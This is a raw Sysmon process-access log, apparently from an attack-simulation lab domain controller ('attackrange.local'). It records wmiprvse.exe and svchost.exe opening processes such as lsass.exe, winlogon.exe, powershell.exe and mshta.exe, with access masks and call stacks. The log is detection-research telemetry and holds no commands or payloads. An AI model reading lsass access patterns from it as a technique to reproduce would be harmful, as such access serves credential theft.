16:04:52.825{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4986-6008-0C00-00000000A301}608C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029972Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:52.825{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4985-6008-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029971Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:52.825{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4984-6008-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029970Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:52.809{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4985-6008-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029969Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:52.809{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4985-6008-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029968Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:52.809{7901BC46-4985-6008-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{7901BC46-4987-6008-1600-00000000A301}1536C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030109Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:53.903{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-54A4-6008-CC06-00000000A301}1524C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030108Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:53.903{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-54A4-6008-CB06-00000000A301}1100C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030107Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:53.903{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-54A4-6008-CA06-00000000A301}4472C:\Windows\System32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030106Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:53.903{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-53D1-6008-A006-00000000A301}4404C:\Windows\system32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030105Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:53.903{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4405-00000000A301}7000C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030104Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:53.903{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4305-00000000A301}7420C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030103Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:53.903{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4DC0-6008-FB02-00000000A301}8056C:\Program Files\Internet Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030102Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:53.903{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A9B-6008-1501-00000000A301}6076C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030101Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:53.903{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A99-6008-1401-00000000A301}5960C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030100Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:53.903{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030099Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:53.903{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FF00-00000000A301}4808C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030098Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:53.887{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FC00-00000000A301}5008C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030097Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:53.887{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F600-00000000A301}1548C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030096Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:53.887{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F300-00000000A301}4180C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030095Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:53.887{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A27-6008-E400-00000000A301}2860C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e